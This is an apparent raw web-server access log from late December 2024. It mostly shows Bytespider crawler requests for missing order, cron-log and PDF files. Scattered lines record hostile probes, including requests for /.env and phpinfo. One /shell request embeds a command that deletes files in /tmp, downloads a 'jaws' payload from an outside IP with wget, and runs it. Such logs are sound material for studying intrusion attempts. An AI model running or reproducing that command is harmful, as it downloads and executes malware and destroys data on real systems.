156.59.198.135 - - [29/Dec/2024:08:51:28 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202004271703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:08:55:28 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202110111503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
167.94.138.115 - - [29/Dec/2024:08:58:45 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.138.115 - - [29/Dec/2024:08:59:00 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.115 - - [29/Dec/2024:08:59:03 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.115 - - [29/Dec/2024:08:59:06 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.115 - - [29/Dec/2024:08:59:08 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
162.217.96.21 - - [29/Dec/2024:08:59:12 +0100] "\x16\x03\x01\x02" 400 383 "-" "-"
156.59.198.135 - - [29/Dec/2024:08:59:28 +0100] "GET /renault.activities.at/htdocs/log/cron/shipp_Export_Data_3114804.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:09:03:29 +0100] "GET /renault.activities.at/htdocs/log/cron/pickupLogisticData_3116172.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
162.217.96.21 - - [29/Dec/2024:09:03:50 +0100] "GET //libs/js/iframe.js HTTP/1.1" 404 289 "-" "python-requests/2.27.1"
156.59.198.136 - - [29/Dec/2024:09:07:29 +0100] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3116234.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
38.180.96.108 - - [29/Dec/2024:09:07:39 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
162.217.96.21 - - [29/Dec/2024:09:09:12 +0100] "\x16\x03\x01\x02" 400 383 "-" "-"
156.59.198.136 - - [29/Dec/2024:09:11:29 +0100] "GET /renault.activities.at/htdocs/log/cron/exportXML_3115052.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.112.187 - - [29/Dec/2024:09:12:58 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-T819) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Safari/537.36"
109.123.255.89 - - [29/Dec/2024:09:15:18 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.13.227.151/jaws;sh+/tmp/jaws" 400 383 "-" "-"
156.59.198.136 - - [29/Dec/2024:09:15:29 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911111503_RenOrder.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:09:19:30 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10963707.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:09:23:29 +0100] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3116090.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:09:27:29 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11182088.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:09:31:30 +0100] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115576.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:09:35:30 +0100] "GET /renault.2web.at/stats/lang/awstats-nn.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:09:39:30 +0100] "GET /renault.activities.at/htdocs/log/cron/importLogisticData_3116188.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:09:43:30 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911290903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:09:47:30 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12423080.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
198.235.24.179 - - [29/Dec/2024:09:49:10 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [29/Dec/2024:09:51:30 +0100] "GET /hausegger.activities.at/stats/lang/tooltips_w/awstats-tt-es.txt HTTP/1.0" 404 317 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
146.19.24.18 - - [29/Dec/2024:09:53:07 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [29/Dec/2024:09:55:30 +0100] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115724.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:09:59:31 +0100] "GET /renault.activities.at/htdocs/log/cron/importLogisticData_3116240.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:10:03:31 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202107141003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:10:07:31 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002041603_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:10:11:31 +0100] "GET /renault.activities.at/htdocs/ewp/ew_includes/popups/ew_images/swap.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.155 - - [29/Dec/2024:10:13:25 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [29/Dec/2024:10:15:31 +0100] "GET /ed.activities.at/stats/lang/awstats-is.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:10:19:31 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103291603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.215.236.240 - - [29/Dec/2024:10:20:52 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
156.59.198.135 - - [29/Dec/2024:10:23:32 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103031503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:10:27:32 +0100] "GET /renault.activities.at/htdocs/log/cron/system_mail_3114808.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:10:31:32 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106101303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:10:35:31 +0100] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115577.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:10:39:32 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109141403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
170.249.221.202 - - [29/Dec/2024:10:42:29 +0100] "CONNECT www.google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
156.59.198.135 - - [29/Dec/2024:10:43:32 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10694175.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:10:47:32 +0100] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3114855.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:10:51:32 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105040903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.16.39.9 - - [29/Dec/2024:10:54:08 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [29/Dec/2024:10:55:33 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10319976.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
65.49.1.29 - - [29/Dec/2024:10:56:10 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.136 - - [29/Dec/2024:10:59:33 +0100] "GET /renault.activities.at/htdocs/log/cron/minimum_stock_3115489.txt HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.115.119 - - [29/Dec/2024:10:59:41 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0"
156.59.198.136 - - [29/Dec/2024:11:03:34 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108111403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:11:07:34 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12423093.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.53.205 - - [29/Dec/2024:11:10:08 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [29/Dec/2024:11:11:34 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11013263.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:11:15:34 +0100] "GET /docs/contadino/2017/RE17-000029.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:11:19:34 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001171003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:11:23:35 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11170212.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:11:27:34 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911260803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:11:31:35 +0100] "GET /renault.activities.at/htdocs/newsletter_log/nl_608259.txt HTTP/1.0" 404 316 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:11:35:35 +0100] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115481.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:11:39:35 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10884296.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:11:43:35 +0100] "GET /renault.2web.at/htdocs/binaries/10023570.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:11:47:35 +0100] "GET /default/cgi-bin/lang/awstats-nb.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:11:51:35 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11054451.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:11:55:36 +0100] "GET /renault.activities.at/htdocs/log/cron/exportXML_3116413.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:11:59:36 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10748560.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.19.138.234 - - [29/Dec/2024:12:03:27 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [29/Dec/2024:12:03:36 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10957379.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:12:07:37 +0100] "GET /hausegger.activities.at/stats/lang/tooltips_w/awstats-tt-ro.txt HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:12:11:37 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image043.gif HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:12:15:38 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910291303_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:12:19:38 +0100] "GET /docs/contadino/2017/RE17-000024.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.68.110 - - [29/Dec/2024:12:21:46 +0100] "CONNECT example.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
156.59.198.135 - - [29/Dec/2024:12:23:38 +0100] "GET /renault.activities.at/htdocs/log/cron/pickupLogisticData_3115440.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:12:27:38 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11890006.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:12:31:38 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010101203_RenOrder.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.16.39.9 - - [29/Dec/2024:12:32:13 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [29/Dec/2024:12:35:38 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909090903_RenOrder.xml HTTP/1.0" 404 326 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
170.249.221.202 - - [29/Dec/2024:12:37:49 +0100] "CONNECT www.google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
156.59.198.136 - - [29/Dec/2024:12:39:39 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10320004.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:12:43:39 +0100] "GET /renault.activities.at/htdocs/log/cron/autologout_3115474.txt HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:12:47:39 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11087289.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:12:51:38 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910301203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:12:55:39 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108051603_RenOrder.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:12:59:39 +0100] "GET /renault.activities.at/htdocs/log/cron/check_inventory_days_3115825.txt HTTP/1.0" 404 326 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:13:03:39 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908261603_RenOrder.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.161 - - [29/Dec/2024:13:04:08 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.135 - - [29/Dec/2024:13:07:39 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910081403_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Dec/2024:13:11:39 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image079.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.53.205 - - [29/Dec/2024:13:14:54 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [29/Dec/2024:13:15:40 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108171103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:13:19:40 +0100] "GET /renault.activities.at/htdocs/log/cron/shipp_Export_Data_3115760.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Dec/2024:13:23:40 +0100] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115797.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.213 - - [29/Dec/2024:13:26:54 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [29/Dec/2024:13:27:40 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908301003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.75 - - [29/Dec/2024:13:28:32 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
65.49.20.69 - - [29/Dec/2024:13:29:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
156.59.198.136 - - [29/Dec/2024:13:31:41 +0100] "GET /default/cgi-bin/lang/awstats-es.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
65.49.20.69 - - [29/Dec/2024:13:32:57 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.57"
179.43.191.146 - - [29/Dec/2024:13:33:41 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
65.49.20.69 - - [29/Dec/2024:13:34:11 +0100] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
65.49.20.69 - - [29/Dec/2024:13:34:45 +0100] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
